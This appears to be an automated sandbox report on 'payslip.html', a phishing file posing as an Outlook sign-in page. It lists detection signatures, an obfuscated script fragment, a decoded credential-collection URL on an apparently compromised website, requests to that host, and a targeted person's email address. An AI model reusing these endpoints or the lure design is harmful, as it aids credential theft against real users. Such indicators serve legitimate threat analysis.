Edit tour

Windows Analysis Report
payslip.html

Overview

General Information

Sample Name:payslip.html
Analysis ID:1303950
MD5:33cde1d398e680024321f7eb4cead28c
SHA1:dc0bbc5b99dbbb4ba0e1c7905dbaf338c257796f
SHA256:ff5c7420801293ba464f5bc05424114ec4ae2d5b734540d3110446d907598d1b
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Detected javascript redirector / loader
HTML file submission containing password form
HTML page contains obfuscate javascript
HTML document with suspicious title
HTML page contains hidden email address
HTML Script injector detected
HTML document with suspicious name
Phishing site detected (based on image similarity)
Detected hidden input values containing email addresses (often used in phishing pages)
Invalid 'forgot password' link found
None HTTPS page querying sensitive user data (password, username or email)
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML body with high number of embedded images detected
HTML title does not match URL
HTML body with high number of large embedded background images detected
IP address seen in connection with other malware

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\payslip.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 1612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1780,i,17506270214673181647,1305193494310523666,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • chrome.exe (PID: 5196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.microsoft.com/en-us/store/collections/xboxcontrollers?ocid=cmmwjk1aljr&form=M7001T&msclkid=8a1d859a8e6b186635d8e16d33c8a052 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 3056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=1904,i,9688891410887810874,4516259265588636575,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 0.2.pages.csv, type: HTML
    Source: payslip.htmlHTTP Parser: Low number of body elements: 2
    Source: payslip.htmlHTTP Parser: var 0x4bde90 = 0x22dd;function 0x5a37() { var 0x92de8 = [ 9544kaoxps, 5005T
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: var 0x4bde90 = 0x22dd;function 0x5a37() { var 0x92de8 = [ 9544kaoxps, 5005TUDxl
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: var 0x4bde90 = 0x22dd;function 0x5a37() { var 0x92de8 = [ 9544kaoxps, 5005TUDxl
    Source: file:///C:/Users/user/Desktop/payslip.htmlTab title: Sign in to Outlook
    Source: payslip.htmlHTTP Parser: orryan.schriver@viha.ca
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: orryan.schriver@viha.ca
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: orryan.schriver@viha.ca
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: New script tag found
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: New script, src: https://code.jquery.com/jquery-3.1.1.min.js
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: New script, src: https://code.jquery.com/jquery-3.1.1.min.js
    Source: file:///C:/Users/user/Desktop/payslip.htmlMatcher: Found strong image similarity, brand: MICROSOFT
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: orryan.schriver@viha.ca
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Base64 decoded: https://www.grandehotelbraganca.com.br/host22/7ffe563.php
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Total embedded image size: 13734
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Title: Sign in to Outlook does not match URL
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: Total embedded background img size: 265902
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: No <meta name="author".. found
    Source: payslip.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: chromecache_254.1.dr, chromecache_251.1.drString found in binary or memory: http://fontawesome.io
    Source: chromecache_254.1.dr, chromecache_251.1.drString found in binary or memory: http://fontawesome.io/license
    Source: chromecache_258.1.drString found in binary or memory: https://www.grandehotelbraganca.com.br/host22/7ffe563.php
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=YES+srp.gws-20210602-0-RC3.de+FX+536
    Source: unknownDNS traffic detected: queries for: clients2.google.com
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.102&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.102Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /host22/admin/js/mf.php?id=94Egx7Upb HTTP/1.1Host: www.grandehotelbraganca.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /host22/7ffe563.php HTTP/1.1Host: www.grandehotelbraganca.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /host22/7ffe563.php HTTP/1.1Host: www.grandehotelbraganca.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=da9f1c9bffe96152cbfe03a6e57e6db1
    Source: global trafficHTTP traffic detected: GET /dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=636934712887427058 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=636934712887427058 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

    System Summary

    barindex
    Source: Name includes: payslip.htmlInitial sample: payslip
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\payslip.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1780,i,17506270214673181647,1305193494310523666,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.microsoft.com/en-us/store/collections/xboxcontrollers?ocid=cmmwjk1aljr&form=M7001T&msclkid=8a1d859a8e6b186635d8e16d33c8a052
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=1904,i,9688891410887810874,4516259265588636575,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1780,i,17506270214673181647,1305193494310523666,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1988 --field-trial-handle=1904,i,9688891410887810874,4516259265588636575,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: classification engineClassification label: mal80.phis.winHTML@30/13@7/10
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: file:///C:/Users/user/Desktop/payslip.htmlHTTP Parser: file:///C:/Users/user/Desktop/payslip.html
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    2
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1303950 Sample: payslip.html Startdate: 06/09/2023 Architecture: WINDOWS Score: 80 26 Yara detected HtmlPhish10 2->26 28 HTML document with suspicious name 2->28 30 HTML page contains hidden email address 2->30 32 6 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.1 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        14 chrome.exe 9->14         started        process5 dnsIp6 20 part-0041.t-0009.t-msedge.net 13.107.213.69, 443, 49739, 49740 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->20 22 code.jquery.com 69.16.175.10, 443, 49733 HIGHWINDS3US United States 11->22 24 10 other IPs or domains 11->24

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://www.grandehotelbraganca.com.br/host22/7ffe563.php0%Avira URL Cloudsafe
    https://www.grandehotelbraganca.com.br/host22/admin/js/mf.php?id=94Egx7Upb0%Avira URL Cloudsafe
    https://aadcdn.msauthimages.net/dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=6369347128874270580%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    accounts.google.com
    142.250.68.45
    truefalse
      high
      code.jquery.com
      69.16.175.10
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          part-0041.t-0009.t-msedge.net
          13.107.213.69
          truefalse
            unknown
            www.google.com
            142.250.217.132
            truefalse
              high
              grandehotelbraganca.com.br
              184.171.250.122
              truefalse
                unknown
                clients.l.google.com
                142.250.72.142
                truefalse
                  high
                  cs1025.wpc.upsiloncdn.net
                  152.199.4.73
                  truefalse
                    unknown
                    aadcdn.msauthimages.net
                    unknown
                    unknownfalse
                      unknown
                      www.grandehotelbraganca.com.br
                      unknown
                      unknownfalse
                        unknown
                        clients2.google.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://aadcdn.msauthimages.net/dbd5a2dd-x6hl24t5ubwxivdht6h-gmofho2fzpu1ntcfrpodf0e/logintenantbranding/0/bannerlogo?ts=636934712887427058false
                          • Avira URL Cloud: safe
                          unknown
